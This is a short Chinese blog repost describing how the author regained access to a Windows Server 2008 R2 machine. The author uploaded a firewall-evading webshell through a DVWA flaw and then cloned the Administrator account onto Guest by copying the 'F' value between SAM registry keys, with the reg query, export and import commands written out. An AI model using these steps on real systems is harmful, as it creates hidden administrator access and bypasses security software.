记一次克隆管理员的经历

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了记一次克隆管理员的经历相关的知识,希望对你有一定的参考价值。

半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了
还好本地登录的安全策略留了一个guest用户
本地搭建了DVWA WEB渗透测试环境 权限为system
通过漏洞上传过狗一句话木马
木马权限为system权限
可以创建用户 但是无法将用户添加至管理员组 估计是安全狗拦截了提权操作
随后将管理员权限克隆至login用户 登录成功

目标将把Guest提权为Administrator
查询SAM注册表下有什么配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users
技术分享图片
查询用户名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names
技术分享图片
000001F4的配置文件对应的用户为Administrator
000001F5的配置文件对应的用户为Guest
然后把注册表下的键值导出
先把Administrator的键值导出 保存到C盘名称为1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的键值导出 保存到C盘名称为2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg

然后将1.reg “F”的键值数据复制下来 替换2.reg里面的”F”键值
技术分享图片
然后在把2.reg导入到注册表
Reg import c:\2.reg
最后使用guest登录
用户家目录等 都变成了Administrator的数据
实际上就是Administrator=Guest

以上是关于记一次克隆管理员的经历的主要内容,如果未能解决你的问题,请参考以下文章

初面蚂蚁金服,记一次美团Java研发岗的面试经历

记一次使用tortoiseGit(小乌龟git)报错的经历

[软件测试_hw1]记一次调试bug的经历

记一次内存溢出的分析经历——thrift带给我的痛orz

记一次B站答题经历

记一次JSON循环依赖的经历